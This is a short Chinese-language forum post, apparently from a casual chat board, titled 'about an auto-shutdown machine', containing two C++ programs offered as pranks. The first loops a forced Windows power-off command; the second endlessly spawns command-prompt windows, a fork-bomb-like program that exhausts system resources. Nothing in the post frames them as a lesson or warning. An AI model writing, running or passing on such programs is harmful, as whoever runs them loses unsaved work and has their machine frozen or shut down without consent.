关于“自动关机机”
  • 板块灌水区
  • 楼主wuweien
  • 当前回复3
  • 已保存回复3
  • 发布时间2024/10/2 11:30
  • 上次更新2024/10/2 11:31:51
查看原帖
关于“自动关机机”
1048156
wuweien楼主2024/10/2 11:30
#include<bits/stdc++.h>
#include<windows.h>
using namespace std;
signed main(){
    ios::sync_with_stdio(false);cin.tie(NULL);cout.tie(NULL);
    while(true){
    	system("shutdown -p");
	} 
	return 0;
}
#include <bits/stdc++.h>
using namespace std;
int main(){
	while(true){
		system("start cmd");
	}
	return 0;
}
	
2024/10/2 11:30
加载中...